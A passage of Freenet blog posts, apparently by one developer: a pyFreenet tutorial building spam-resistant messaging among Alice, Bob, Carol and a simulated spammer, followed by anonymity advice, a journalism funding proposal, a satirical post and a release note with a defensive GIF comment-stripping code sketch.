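Just to illustrate the idea (we will not use it in this series): a hedged sketch reusing the names from the Alice-and-Bob example above, assuming the python-gnupg package, that Bob’s public GnuPG key is already in Alice’s keyring, and a placeholder recipient id.

import gnupg  # the python-gnupg package, an assumption for this sketch
gpg = gnupg.GPG()
# Alice encrypts her alice-to-bob USK to Bob before uploading it,
# so only Bob learns which key to watch ("bob@example.org" is a placeholder)
encrypted = str(gpg.encrypt(alice_to_bob_public, "bob@example.org"))
n.put(uri=answerkey, data=encrypted,
      Global=True, persistence="forever",
      realtime=True, priority=1)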

This gives us convenient, fully decentralized, spam-resistant, anonymous communication channels. Setting up a communication channel to a known person requires solving one riddle (in a real setting likely a CAPTCHA, or a password-prompt), and then the channel persists.

Note: To speed up these tests, I added another speed hack: IgnoreUSKDatehints. That turns off Date Hints, so discovering new versions will no longer be constant in the number of intermediate versions. For our messaging system that does not hurt, since we don’t have many intermediate messages we want to skip. For websites however, that could lead your visitors to see several old versions before they finally get the most current version. So be careful with this hack - just like you should with the other speed hacks.

But if we want to reach many people, we have to solve one riddle per person, which just doesn’t scale. To fix this, we can publish a list of all people we trust to be real people. Let’s do that.

Many-to-many: KSK->CAPTCHA->USK->USK which is linked in the original USK

To enable (public) many-to-many communication, we propagate the information that we believe that someone isn’t a spammer and add a blacklist to get rid of people who suddenly start to spam.

The big change with this scheme is the two-step authentication: Something expensive (solving a riddle) gets you seen by a few people, and if you then contribute constructively in a social context, they mark you as a non-spammer and you get seen by more people.

The clever part about that scheme is that socializing is actually no cost to honest users (that’s why we use things like Sone or FMS), while it is a cost to attackers.

Let’s take Alice and Bob again, but add Carol. First Bob introduces himself to Alice, then Carol introduces herself to Alice. Thanks to propagating the riddle information, Carol can directly write to Bob without first solving a riddle. Scaled up, that means you only need to prove a single time that you are not a spammer (or rather: not disruptive) if you want to enter a community.

To make it easier to follow, we will implement this with a bit of abstraction: People have a private key, can introduce themselves and publish lists of messages. Also they keep a public list of known people and a list of people they see as spammers who want to disrupt communication.

I got a bit carried away while implementing this, but please bear with me: I worked hard to make it this much fun.

The finished program is available as alice_bob_carol.py. Just download and run it with python alice_bob_carol.py.

Let’s start with the minimal structure for any pyFreenet using program:

import fcp

n = fcp.node.FCPNode() # for debugging add verbosity=5

<<body>>

n.shutdown()

The body contains the definitions of a person with different actors, an update step (as simplification I use global stepwise updates) as well as the setup of the communication. Finally we need an event loop to run the system.

<<preparation>>

<<person>>

<<update>>

<<setup>>

<<event_loop>>

We start with some imports – and a bit of fun :)

import uuid
import random
try:
    import chatterbot # let's get a real conversation :)
    # https://github.com/guntherc/ChatterBot/wiki/Quick-Start
    # get with `pip install --user chatterbot`
    irc_loguri = "USK@Dtz9FjDPmOxiT54Wjt7JwMJKWaqSOS-UGw4miINEvtg,cuIx2THw7G7cVyh9PuvNiHa1e9BvNmmfTcbQ7llXh2Q,AQACAAE/irclogs/1337/"
    print "Getting the latest IRC log as base for the chatterbot"
    IRC_LOGLINES = n.get(uri=irc_loguri, realtime=True, priority=1, followRedirect=True)[1].splitlines()
    import re # what follows is an evil hack, but what the heck :)
    p = re.compile(r'<.*?>')
    q = re.compile(r'&.*?;')
    IRC_LOGLINES = [q.sub('', p.sub('', str(unicode(i.strip(), errors="ignore"))))
                    for i in IRC_LOGLINES]
    IRC_LOGLINES = [i[:-5] for i in IRC_LOGLINES # skip the time (last 5 letters)
                    if (i[:-5] and # skip empty
                        not "spam" in i # do not trigger spam-marking
                    )][7:] # skip header 
except ImportError:
    chatterbot = None

The real code begins with some helper functions – essentially data definition.

def get_usk_namespace(key, name, version=0):
    """Get a USK key with the given namespace (foldername)."""
    return "U" + key[1:] + name + "/" + str(version) + "/"

def extract_raw_from_usk(key):
    """Get an SSK key as used to identify a person from an arbitrary USK."""
    return "S" + (key[1:]+"/").split("/")[0] + "/"

def deserialize_keylist(keys_data):
    """Parse a known file to get a list of keys. Reverse: serialize_keylist."""
    return [i for i in keys_data.split("\n") if i]

def serialize_keylist(keys_list):
    """Serialize the known keys into a text file. Reverse: parse_known."""
    return "\n".join(keys_list)

Now we can define a person. The person is the primary actor. To keep everything contained, I use a class with some helper functions.

class Person(object):
    def __init__(self, myname, mymessage):
        self.name = myname
        self.message = mymessage
        self.introduced = False
        self.public_key, self.private_key = n.genkey()
        print self.name, "uses key", self.public_key
        # we need a list of versions for the different keys
        self.versions = {}
        for name in ["messages", "riddles", "known", "spammers"]:
            self.versions[name] = -1 # does not exist yet
        # and sets of answers, watched riddle-answer keys, known people and spammers.
        # We use sets for these, because we only need membership-tests and iteration.
        # The answers contain KSKs, the others the raw SSK of the person.
        # watched contains all persons whose messages we read.
        self.lists = {}
        for name in ["answers", "watched", "known", "spammers", "knowntocheck"]:
            self.lists[name] = set()
        # running requests per name, used for making all persons update asynchronously
        self.jobs = {}
        # and just for fun: get real conversations. Needs chatterbot and IRC_LOGLINES.
        # this is a bit slow to start, but fun. 
        try:
            self.chatbot = chatterbot.ChatBot(self.name)
            self.chatbot.train(IRC_LOGLINES)
        except:
            self.chatbot = None


    def public_usk(self, name, version=0):
        """Get the public usk of type name."""
        return get_usk_namespace(self.public_key, name, version)
    def private_usk(self, name, version=0):
        """Get the private usk of type name."""
        return get_usk_namespace(self.private_key, name, version)

    def put(self, key, data):
        """Insert the data asynchronously to the key. This is just a helper to
avoid typing the realtime arguments over and over again.

        :returns: a job object. To get the public key, use job.wait(60)."""
        return n.put(uri=key, data=data, async=True,
                     Global=True, persistence="forever",
                     realtime=True, priority=1,
                     IgnoreUSKDatehints="true")

    def get(self, key):
        """Retrieve the data asynchronously to the key. This is just a helper to
avoid typing the realtime arguments over and over again.

        :returns: a job object. To get the public key, use job.wait(60)."""
        return n.get(uri=key, async=True,
                     realtime=True, priority=1,
                     IgnoreUSKDatehints="true",
                     followRedirect=True)

    def introduce_to_start(self, other_public_key):
        """Introduce self to the other by solving a riddle and uploading the messages USK."""
        riddlekey = get_usk_namespace(other_public_key, "riddles", "-1") # -1 means the latest version
        try:
            self.jobs["getriddle"].append(self.get(riddlekey))
        except KeyError:
            self.jobs["getriddle"] = [self.get(riddlekey)]

    def introduce_start(self):
        """Select a person and start a job to get a riddle."""
        known = list(self.lists["known"])
        if known: # introduce to a random person to minimize
                  # the chance of collisions
            k = random.choice(known)
            self.introduce_to_start(k)

    def introduce_process(self):
        """Get and process the riddle data."""
        for job in self.jobs.get("getriddle", [])[:]:
            if job.isComplete():
                try:
                    riddle = job.wait()[1]
                except Exception as e: # try again next time
                    print self.name, "getting the riddle from", job.uri, "failed with", e
                    return
                self.jobs["getriddle"].remove(job)
                answerkey = self.solve_riddle(riddle)
                messagekey = self.public_usk("messages")
                try:
                    self.jobs["answerriddle"].append(self.put(answerkey, messagekey))
                except KeyError:
                    self.jobs["answerriddle"] = [self.put(answerkey, messagekey)]

    def introduce_finalize(self):
        """Check whether the riddle answer was inserted successfully."""
        for job in self.jobs.get("answerriddle", [])[:]:
            if job.isComplete():
                try:
                    job.wait()
                    self.jobs["answerriddle"].remove(job)
                    self.introduced = True
                except Exception as e: # try again next time
                    print self.name, "inserting the riddle-answer failed with", e
                    return

    def new_riddle(self):
        """Create and upload a new riddle."""
        answerkey = "KSK@" + str(uuid.uuid1()) + "-answered"
        self.lists["answers"].add(answerkey)
        self.versions["riddles"] += 1
        next_riddle_key = self.private_usk("riddles", self.versions["riddles"])
        self.put(next_riddle_key, answerkey)


    def solve_riddle(self, riddle):
        """Get the key for the given riddle. In this example we make it easy:
The riddle is the key. For a real system, this needs user interaction.
        """
        return riddle

    def update_info(self):
        for name in ["known", "spammers"]:
            data = serialize_keylist(self.lists[name])
            self.versions[name] += 1
            key = self.private_usk(name, version=self.versions[name])
            self.put(key, data)

    def publish(self, data):
        self.versions["messages"] += 1
        messagekey = self.private_usk("messages", version=self.versions["messages"])
        print self.name, "published a message:", data
        self.put(messagekey, data)

    def check_network_start(self):
        """start all network checks."""
        # first cancel all running jobs which will be replaced here.
        for name in ["answers", "watched", "known", "knowntocheck", "spammers"]:
            for job in self.jobs.get(name, []):
                job.cancel()
        # start jobs for checking answers, for checking all known people and for checking all messagelists for new messages.
        for name in ["answers"]:
            self.jobs[name] = [self.get(i) for i in self.lists[name]]
        for name in ["watched"]:
            self.jobs["messages"] = [self.get(get_usk_namespace(i, "messages")) for i in self.lists[name]]
        self.jobs["spammers"] = []
        for name in ["known", "knowntocheck"]:
            # find new nodes
            self.jobs[name] = [self.get(get_usk_namespace(i, "known")) for i in self.lists[name]]
            # register new nodes marked as spammers
            self.jobs["spammers"].extend([self.get(get_usk_namespace(i, "spammers")) for i in self.lists[name]])

    def process_network_results(self):
        """wait for completion of all network checks and process the results."""
        for kind, jobs in self.jobs.items():
            for job in jobs:
                if not kind in ["getriddle", "answerriddle"]:
                    try:
                        res = job.wait(60)[1]
                        self.handle(res, kind, job)
                    except:
                        continue

    def handle(self, result, kind, job):
        """Handle a successful job of type kind."""
        # travel the known nodes to find new ones
        if kind in ["known", "knowntocheck"]:
            for k in deserialize_keylist(result):
                if (not k in self.lists["spammers"] and
                    not k in self.lists["known"] and
                    not k == self.public_key):
                    self.lists["knowntocheck"].add(k)
                    self.lists["watched"].add(k)
                    print self.name, "found and started to watch", k
        # read introductions
        elif kind in ["answers"]:
            self.lists[kind].remove(job.uri) # no longer need to watch this riddle
            k = extract_raw_from_usk(result)
            if not k in self.lists["spammers"]:
                self.lists["watched"].add(k)
                print self.name, "discovered", k, "through a solved riddle"
        # remove found spammers
        elif kind in ["spammers"]:
            for k in deserialize_keylist(result):
                if not k in self.lists["known"]:
                    # stop watching reported spammers; discard avoids an
                    # error if we were not watching them in the first place
                    self.lists["watched"].discard(k)
        # check all messages for spam
        elif kind in ["messages"]:
            k = extract_raw_from_usk(job.uri)
            if not "spam" in result:
                if not k == self.public_key:
                    print self.name, "read a message:", result
                    self.chat(result) # just for fun :)
                    if not k in self.lists["known"]:
                        self.lists["known"].add(k)
                        self.update_info()
                        print self.name, "marked", k, "as known person"
            else:
                self.lists["watched"].remove(k)
                if not k in self.lists["spammers"]:
                    self.lists["spammers"].add(k)
                    self.update_info()
                    print self.name, "marked", k, "as spammer"


    def chat(self, message):
        if self.chatbot and not "spam" in self.message:
            msg = message[message.index(":")+1:-10].strip() # remove name and step
            self.message = self.name + ": " + self.chatbot.get_response(msg)

# some helper functions; the closest equivalent to structure definition
<<helper_functions>>

Note that nothing in here depends on running these from the same program. All communication between persons is done purely over Freenet. The only requirement is that there is a bootstrap key: One person known to all new users. This person could be anonymous, and even with this simple code there could be multiple bootstrap keys. In Freenet we call these people “seeds”. They are the seeds from which the community grows. As soon as someone besides the seed adds a person as known, the seed is no longer needed to keep the communication going.

The spam detection implementation is pretty naive: It trusts people to mark others as spammers. In a real system, there will be disputes about what constitutes spam and the system needs to show who marks whom as spammer, so users can decide to stop trusting the spam notices from someone when they disagree. As example for a real-life system, the Web of Trust plugin uses trust ratings between -100 and 100 and calculates a score from the ratings of all trusted people to decide how much to trust people who are not rated explicitly by the user.
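
As a rough illustration of that idea (this is not the actual Web of Trust algorithm, just a hedged sketch): a score for a person not explicitly rated by the user could be a weighted combination of the ratings given by people the user already trusts.

def wot_like_score(ratings, trust):
    """Combine trust ratings (-100..100) that others gave one person
    into a single score, weighted by how much we trust each rater.

    ratings: {rater: rating of the person in question}
    trust:   {rater: our trust in the rater (-100..100)}
    Only positively trusted raters get a say."""
    weighted = [(trust[r] / 100.0) * value
                for r, value in ratings.items()
                if trust.get(r, 0) > 0]
    if not weighted:
        return 0
    return sum(weighted) / len(weighted)

# example: two raters we trust differently judge a newcomer
print wot_like_score({"alice": 80, "bob": -20}, {"alice": 100, "bob": 50})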

With this in place, we need the update system to be able to step through the simulation. We have a list of people who check keys of known other people.

We first start all checks for all people quasi-simultaneously and then check the results in serial to avoid long wait times from high latency. Freenet can check many keys simultaneously, but serial checking is slow.

people = []

def update(step):
    for p in people:
        if not p.introduced:
            p.introduce_start()
    for p in people:
        p.check_network_start()
    for p in people:
        if p.message:
            p.publish(p.name + ": " + p.message + "   (step=%s)" % step)
        p.new_riddle()
    for p in people:
        if not p.introduced:
            p.introduce_process()
    for p in people:
        p.process_network_results()
    for p in people:
        if not p.introduced:
            p.introduce_finalize()

So those are the update tasks - not really rocket science, thanks to the fleshed-out Persons. Only two things remain: setting up the scene and actually running it.

For the setup: We have Alice, Bob and Carol. Let’s also add Chuck, who wants to prevent the others from communicating by flooding them with spam.

def gen_person(name):
    try:
        return Person(myname=name, mymessage=random.choice(IRC_LOGLINES))
    except:
        return Person(myname=name, mymessage="Hi, it's me!")

# start with alice
alice = gen_person("Alice")
people.append(alice)

# happy, friendly people
for name in ["Bob", "Carol"]:
    p = gen_person(name)
    people.append(p)

# and Chuck
p = Person(myname="Chuck", mymessage="spam")
people.append(p)

# All people know Alice (except for Alice).
for p in people:
    if p == alice:
        continue
    p.lists["known"].add(alice.public_key)
    p.lists["watched"].add(alice.public_key)

# upload the first version of the spammer and known lists
for p in people:
    p.update_info()

That’s it. The stage is set, let the trouble begin :)

We don’t need a while loop here, since we just want to know whether the system works. So the event loop is pretty simple: Just call the update function a few times.

for i in range(6):
    update(step=i)

That’s it. We have spam-resistant message channels and community discussions. Now we could go on and implement more algorithms on this scheme, like the turn-based games specification (ever wanted to play against truly anonymous competitors?), Fritter (can you guess from its name what it is? :)), a truly privacy-respecting dropbox, or an anonymizing, censorship-resistant, self-hosting backend for a digital market like OpenBazaar (long defunct by 2023).

But that would go far beyond the goal of this article – which is to give you, my readers, the tools to create the next big thing by harnessing the capabilities of Freenet.

These capabilities have been there for years, but hidden beneath non-existent and outdated documentation, misleading claims of being in alpha stage even though Freenet has been used in what amounts to production for over a decade and, not to forget, the ever-recurring, ever-damning suggestion to SGTFS (second-guess the friendly source). As written in Forgotten Cypherpunk Paradise, Freenet already solved many problems which researchers are only beginning to tackle now, but there are reasons why it was almost forgotten. With this series I intend to fix some of them and start moving Freenet documentation towards the utopian vision laid out in Teach, Don’t Tell. It’s up to you to decide whether I succeeded. If I did, it will show up as a tiny contribution to the utilities and works of art and vision you create.

Note that this is not fast (fast enough for blogging, but not for chat). We could make it faster by going back to SSKs instead of USKs with their additional logic for finding the newest version in O(1), but for USKs there are very cheap methods to get notified of new versions for large numbers of keys (subscribing), which are used by more advanced tools like the Web of Trust and the Sone plugin, so this would be an optimization we would have to revert later. With these methods, Sone reaches round trip times of 5-15 minutes despite using large uploads.

Also, since this uses Freenet as backend, it scales up: If Alice, Bob, Carol and Chuck used different computers instead of running on my single node, their communication would actually be faster, and if they called in all their alphabet and unicode friends, the system would still run fast. We’re harvesting part of the payoff of using a fully distributed backend :)

And with that, this installment ends. You can now implement really cool stuff using Freenet. In the next article I’ll describe how to avoid doing this stuff myself by interfacing with existing plugins. Naturally I could have done that from the start, but then how could I have explained the Freenet communication primitives these plugins use? :)

If you don’t want to wait, have a look at how Infocalypse uses wot to implement github-like access with user/repo, interfaces with Freemail to realize truly anonymous pull-requests from the command line and builds on FMS to provide automated updates of a DVCS wiki over Freenet.

Happy Hacking!

PS: You might ask “What is missing?”. You might have a nagging feeling that something we do every day isn’t in there. And you’re right. It’s scalable search. Or rather: scalable, spam- and censorship-resistant search. Scalable search would be Gnutella. Spam-resistance would be Credence on the social graph (the people you communicate with). Censorship-resistant is unsolved – even Google fails there. But seeing that Facebook just overtook Google as the main source of traffic, we might not actually need fully global search. Together with the cheap and easy update notifications in Freenet (via USKs), a social recommendation and bookmark-sharing system should make scalable search over Freenet possible. And until then there’s always the decentralized YaCy search engine which has been shown to be capable of crawling Freenet. Also there are the Library and Spider plugins, but they need some love to work well.

PPS: You can download the final example as alice_bob_carol.py

Freenet Interview with Zilion

Zilion Web conducted an interview about Freenet with me. Zilion asked interesting questions and I kind of went overboard in answering them. They include:

  • When did you become a freenet developer? Why?
  • Freenet has 18 years of continuous development, from here to there, how do you see your growth?
  • Frost vs. FMS, what is your choice and why?
  • What do you think about people who use Freenet just for illegal purposes? And what is your concept of freedom about that?
  • What to expect from the future in Freenet?
  • Can you tell us how Opennet and Darknet works, and its pros and cons?

To see the answers, just head over to the article:

Interview with Freenet Developer (ArneBab)
https://zilionweb.wordpress.com/2017/08/07/interview-with-freenet-developer-arnebab/

And do install Freenet and then connect confidentially to your friends to build the darknet one friend at a time.

Freenet anonymity: Best case and Worst case

As the i2p people say, anonymity is not a boolean. Freenet allows you to take it a good deal further than i2p or tor, though. If you do it right.

  • Worst case: If all of Apple wanted to find you because you declared that you would post the videos of the new iDing, and you already sent them your videos as a teaser before starting to upload them from an Apple computer (and that just after they lost their beloved dictator), you might be in trouble if you use Opennet. You are about as safe as with tor or i2p.

  • Best case: If a local politician wanted to find you after you uploaded proof that he takes bribes, and you uploaded the files to a new safe key (SSK) and used Freenet in Darknet mode with connections only to friends who would rather die than let someone take over their computer, then there’s no way in hell you’d get found due to Freenet (the file data could betray you, or they could find you by other means, but Freenet won’t be your weak spot).

Naturally real life is somewhere in-between.

Things which improve anonymity a lot in the best case:

  • Don’t let others know the data you are going to upload before the upload has finished (that would allow some attacks).
  • Use only Darknet with trusted friends (Darknet means that you connect only to people you know personally. For that it is necessary to know other people who use Freenet).
  • Upload small files, so the time in which you are actively uploading is short.

Implied are:

  • Use an OS without trojans. So no Windows. (Note: Linux can be hacked, too, but it is far less likely to already have been compromised)
  • Use no Apple devices. You don’t control them yourself and can’t know what they have under the hood. (You are compromised from the time you buy them)
  • If you use Android, flash it yourself to give it an OS you control. (Freenet was not available for Android when this was written; as of 2021 it is available via freenet-mobile/app.)
  • Know your friends.

Important questions to ask:

  • Who would want to find you?
  • How much would they invest to find you?
  • Do they already try to monitor Freenet? (in that case uploading files with known content would be dangerous)
  • Do they already know you personally? If yes and if they might have already compromised your computer or internet connection, you can’t upload anything anonymously anywhere. In that case, never let stuff get onto your computer in the first place. Let someone else upload it, who is not monitored (yet).
  • Can they eavesdrop on your internet connection? Then they might guess that you use Freenet from the amount of encrypted communication you do and might want to bug your computer just in case you want to use Freenet against them some day. If you think they might have bugged your computer, the notes in the previous point apply.

See the Security Summary (mostly possible attacks) in the freenet wiki for details.

Freenet as backing store for sites on the clearnet (in use today)

Chris Double (bluishcoder) changed his main website to be served directly from Freenet:

Thanks to this, the same article is now available from my inproxy.

And, naturally, from Freenet:

USK@1ORdIvjL2H1bZblJcP8hu2LjjKtVB-rVzp8mLty~5N4,8hL85otZBbq0geDsSKkBK4sKESL2SrNVecFZz9NxGVQ,AQACAAE/bluishcoder/20/2015/09/14/using-freenet-for-static-websites.html

This makes the site secure against efforts to take it down, and even if the keys were compromised, old editions would still be available as SSKs.

Example: the article about using Freenet as backend in version 20 of the site

And not to forget: People can access it anonymously from Freenet.

Freenet for Journalists, funding proposal

This is a funding proposal I sent to Open Technology Fund to make Freenet suitable for Journalists and their sources. Sadly it got rejected, but maybe it helps future proposals.

Project name: Freenet for Journalists
Duration: 24 months
Amount: 800000
Contact name: Arne Babenhauserheide
Contact email: arne_bab -ät- web -punkt- de

Descriptors

  • Status: It's basically done. (Release)
  • Focus: Privacy enhancement
  • Objective(s): Advocacy, Technology development, Deploying technology, Training
  • Beneficiaries: General public, Sexual minorities, Activists, Journalists, Advocacy groups/NGOs, Technologists, Entrepreneurs
  • Addressed problems: Restrictive Internet filtering by technical methods (IP blocking, DNS filtering, TCP RST, DPI, etc.), Blocking, filtering, or modification of political, social, and/or religious content (including apps), Technical attacks against government critics, journalists, and/or human rights organizations (Cyberattacks), Physical intimidation, arrest, violence (including device seizure or destruction), and death for political or social reasons, Repressive surveillance or monitoring of communication, Policies, laws, or directives that increase surveillance, censorship, and punishment, Government practices that hold intermediaries (social networks or ISPs) liable for user content
  • Technology attributes: User interface/experience, Anonymity, Cryptography, Desktop client, Desktop App, Sensitive data, Networking
  • Region: Global

Project description

Freenet is the only tool to date which addresses all technical requirements for freedom of the press:

  • Confidential communication between sources and journalists while hiding that communication is taking place,
  • Keep journalists independent from large publishers (no need to secure a public server) and
  • Asynchronous usage for sources without exposing at any centralized place that Freenet is used.

However, despite providing the technical foundation for real freedom of the press, Freenet is much too hard to use. Solutions to its usability problems are known, but they need to be implemented, which requires considerable focused effort and coordination with journalists to ensure that the implemented solutions fit the requirements of journalists.

The Freenet for Journalists project is about this focused effort: Making the capabilities of Freenet usable for journalists and sources, so an employee at a military contractor who finds out about illegal activity no longer has to leave the country or rely on large media organizations before blowing the whistle (to stay safe from retribution of the employer).

Project how

Making Freenet easier to use for Journalists and whistleblowers requires technical work:

  • maintain journalist site seamlessly: Enhance the Freereader and Sharewiki plugins.
  • contact a journalist via the site easily: Increase the integration of the freemail plugin.
  • use a traceless persistent pseudonym (QR or written key), integrated seamlessly into the main interface.
  • one-click creation of a Freenet-stick for transient friend-to-friend connections: add connection over single-use tokens.
  • invisible connections (steganography): Finish and merge the pluggable transports branch.
  • grow the network on Android: Improve and expand the icicle app: http://loubo.co/icicle/
  • a minimal security review (we are in contact with security researchers).

Also it requires coordination with and training for journalists to ensure that the workflows we enable integrate well with their workflows.

To tackle this, we asked Asher Wolf, original organizer of the crypto parties, whether she would join the team as community coordinator and trainer if we get funding. She said she would join up (but we need to have funding first: she has a child to support). Also we will collaborate with Glyn Moody who has 30 years of experience in journalism.

To increase user adoption, this project will tackle the main issues we identified as limiting adoption:

  • mediocre user interface,
  • the friend-to-friend mode—one of the unique selling points of Freenet—isn’t actually enjoyable to use yet,
  • most useful features are not visible from the start and do not come pre-activated,
  • there is no working debian package.

We are confident that with a team of at least three developers and a community coordinator and trainer, we can realize that within two years. Plans for this are already made and we have the people; all we need is sufficient funding so we can set aside our day jobs and focus on doing what we believe is needed to regain confidential communication in the digital space.

Project who

The project is for Journalists and their sources.

It will allow people who aren’t yet under targeted surveillance to contact journalists without exposing their identity. It does not matter whether the journalist is under targeted surveillance.

Freenet as leaking platform makes journalists independent from large infrastructure. Journalists often write for several publishers, but platforms like SecureDrop bind them to centralized communication. They are a single point of failure. The same is true for services using Tor to anonymize sources: Here the journalist must run a server which can withstand serious attacks.

In Freenet all nodes in the system collaborate to allow exchanging information confidentially and pseudonymously without making any node a central point of failure.

The core design principle of Freenet is providing Freedom of the Press, and all its features derive from that principle:

  • No censorship by threat: Pseudonymous publication with public/private key cryptography. And usage without leaving information that you use it at a known place: in the friend-to-friend mode Freenet only connects to people you know personally, while still providing a globally connected network in which you can access all content uploaded by all users. You can create a pseudonym and prove that all your articles are written by the same person.
  • No censorship by choking communication: Decentralized spam resistance (beyond mere captchas) and long lifetime for files which are actually accessed: Whether you are the Guardian or a local Indian journalist, your articles stay available as long as people read them.
  • No censorship by deleting information: If something has been uploaded into Freenet, it stays available as long as people access it regularly. All data is stored in encrypted chunks on the computers of its users. Those chunks can be reassembled using the public key, which is retrieved using the URL to the article someone wrote.

Project why

“There is now no shield from forced exposure…The foundation of Groklaw is over…the Internet is over” – Groklaw, Forced Exposure (2013-08-20)

The internet once broke the structural information control from the powerful and as such created the opportunity to strengthen democracy against existing concentrations of power. Total surveillance reverts this because it forces everyone to self-censor communication. There is no longer a way to communicate without exposing the physical identity to strong attackers. Even Tor users can be de-anonymized quickly, for example by breaking servers which provide the services.

Due to the pervasive infiltration of digital communication into day-to-day life, this affects analog communication more and more.

Other services like /TorChat/, /Signal/, /Globaleaks/ and /SecureDrop/ all require some degree of centralization and lack censorship-resistant anti-spam methods (Freenet already provides the latter, due to experiencing how anonymous communication breaks down when it lacks spam resistance). Additionally these other services contain vectors for censorship:

  • Signal relies on /centralized servers/.
  • Globaleaks and SecureDrop need to be run by an organization which can /keep dynamic websites secure on Tor/.
  • TorChat can be blocked for a journalist by /basic spamming/ — or by a targeted DoS attack.

Freenet on the other hand is designed for asynchronous communication (without requiring both participants to be online at the same time). It implements communication features on a decentralized anonymizing datastore built on a friend-to-friend structure. This avoids the problems inherent in other solutions.

Other information

All of Freenet is Free Software licensed under GPL-compatible licenses. You can find additional information on https://freenetproject.org

The financial administration is managed by Freenet Project Inc., a US-based 501(c)(3) non-profit. The project is financed by donations from other organizations and from regular users. This proposal is sent on behalf of the community. The funding plan is cleared not only with other developers but also with the users.

This proposal is written for $800,000 because many experienced Freenet developers are based in Europe and we cannot predict the exchange rate between Euro and Dollar, so we need to leave some room to ensure that we can pay the salaries if the Euro becomes stronger.

For somewhat confidential inquiries, contact press@freenetproject.org (these will not be posted in a public place).

You can contact us publicly by sending an email to devl@freenetproject.org or by joining the IRC channel #freenet @irc.freenode.net

My GnuPG/PGP key (for arne_bab -ät- web -punkt- de) is available from http://draketo.de/inhalt/ich/pubkey.txt with the fingerprint 6B05 41F0 94FF 2163 6FBA 2433 3307 469B FE96C404

Freenet is currently at a point where the technical backend works well and provides features not found in any other program, while the user interface suffers from a large number of annoyances. Unlike new projects which have emerged in the past years, Freenet does not need uncertain research or large reshaping to be suitable for a situation of ubiquitous surveillance. What it needs are improvements in workflows and integration. These are tasks which can be done without facing much uncertainty, but they need focused effort.

To ensure sustainability we will keep development infrastructure distributed: Freenet must not be dependent upon infrastructure we use for this project. Freenet will continue after the project ends, so the features developed during the project will stay available.

Freenet protects your DickPic!

Afraid that the NSA could steal your DickPic? Freenet to the rescue!

Freenet protects your DickPic!
(mirror via Freenet)

Don’t know what this is about?

Watch Edward Snowden reveal DickPic, the latest, most massive surveillance program from the NSA:

Thanks to John Oliver for one of the most awesome acts of journalism I’ve seen!

FAQ

Anonymous@lFG3mGbGf0b8nE6j8RC0i5ZgWEhsQXDG3ghkYIa-1wQ wrote:
I thought Freenet wasn’t able to protect against the NSA?

The link “Connect to your friends” shows how to connect via darknet and communicate via darknet N2N messages (node-to-node messages). From my understanding, these are currently one of the most secure communication methods we can get, because they hide our personal communication beneath Freenet traffic.

They aren’t suited to communicating anonymously (because we can only talk with our friends), but they are well suited to communicating confidentially.

PS: The image is licensed under GPL, copyright: the freenet team (for the rabbit) and Arne Babenhauserheide. It uses the source images Zuchineee (thanks to Arthurcravan prrrr!) and National Security Agency from the public domain. See the sources below. … but you know what: Just share it any way you like. I’m sure the author of the rabbit agrees, and I for sure do ☺

PPS: Yes, I had lots of fun creating this ;-)

PPPS: For some reason, the image disappeared from my server. I did not take it down. Yes, that worries me. What you see above is served from an in-proxy into Freenet. Should that go down, too, you can still use Freenet to access the image or set up your own in-proxy to allow others to see it.

Attachment  Size
freenet-protects-your-dickpic-vs-nsa.gif  659.81 KB
freenet-protects-your-dickpic-vs-nsa.png  126.31 KB
freenet-protects-your-dickpic-vs-nsa.xcf  2.54 MB

Freenet release 1476 brings convenient, privacy-preserving publishing

With build 1476, the Freenet Project introduces convenient privacy-preserving publishing by shipping the latest release of Sharesite, a tool for managing multiple single-page web sites within Freenet. Additional changes include better security against malicious image files, usability improvements and optimization.

Freenet Logo (bunny)

The Freenet Project team announced the newest version of its censorship prevention suite on March 8th 2017. This release provides easy, privacy-preserving publishing in the darknet without the need for a server. By loading the Sharesite plugin, users can publish multiple simple websites with just a few clicks. These sites are stored in a decentralized way within Freenet, so they stay available after the user goes offline. Like all other content in Freenet they can then be accessed anonymously, and users can opt in to receive a notification in the Freenet web interface when a website they watch gets updated.

When accessing content, Freenet provides many precautions against accidental de-anonymization. One of these features is protection against media files which could leak the user's address or exploit security problems in browsers. This release tightens these protections for the common GIF image format by detecting and removing potentially dangerous data in these files, for example comments which could be interpreted as instructions by the browser.
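
To illustrate the general idea behind this kind of filtering (a minimal sketch under my own assumptions, not the actual code of Freenet's ContentFilter): a GIF file stores its image data and metadata in tagged blocks, so a filter can copy the blocks it understands and drop the ones it does not need, such as comment extensions (introducer 0x21, label 0xFE). The class name GifCommentStripper below is made up for this example.

import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;

// Illustrative sketch only, not Freenet's actual filter: copy a GIF stream
// while dropping Comment Extension blocks (introducer 0x21, label 0xFE).
public class GifCommentStripper {

    public static void strip(InputStream in, OutputStream out) throws IOException {
        DataInputStream din = new DataInputStream(in);

        // Header ("GIF87a"/"GIF89a", 6 bytes) + Logical Screen Descriptor (7 bytes).
        byte[] head = new byte[13];
        din.readFully(head);
        out.write(head);

        // Global Color Table, present if the high bit of the packed field is set.
        int packed = head[10] & 0xFF;
        if ((packed & 0x80) != 0) {
            byte[] gct = new byte[3 * (1 << ((packed & 0x07) + 1))];
            din.readFully(gct);
            out.write(gct);
        }

        int b;
        while ((b = din.read()) != -1) {
            if (b == 0x3B) {                       // trailer: end of GIF
                out.write(b);
                break;
            } else if (b == 0x21) {                // extension block
                int label = din.readUnsignedByte();
                boolean drop = (label == 0xFE);    // comment extension -> drop
                if (!drop) { out.write(b); out.write(label); }
                copySubBlocks(din, drop ? null : out);
            } else if (b == 0x2C) {                // image descriptor + image data
                out.write(b);
                byte[] desc = new byte[9];
                din.readFully(desc);
                out.write(desc);
                int iPacked = desc[8] & 0xFF;
                if ((iPacked & 0x80) != 0) {       // local color table
                    byte[] lct = new byte[3 * (1 << ((iPacked & 0x07) + 1))];
                    din.readFully(lct);
                    out.write(lct);
                }
                out.write(din.readUnsignedByte()); // LZW minimum code size
                copySubBlocks(din, out);
            } else {
                throw new IOException("Unexpected GIF block type: " + b);
            }
        }
    }

    // Copy length-prefixed data sub-blocks up to the 0x00 terminator;
    // if out is null the sub-blocks are read and discarded.
    private static void copySubBlocks(DataInputStream din, OutputStream out) throws IOException {
        int len;
        while ((len = din.readUnsignedByte()) != 0) {
            byte[] block = new byte[len];
            din.readFully(block);
            if (out != null) { out.write(len); out.write(block); }
        }
        if (out != null) out.write(0);
    }
}

The real filter presumably does more than this (it also has to validate the blocks it keeps), but the whitelist principle is the same: copy what is known to be safe, drop everything else.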

The new release is available for Windows, OS X, and GNU/Linux. It can be downloaded for free from https://freenetproject.org.

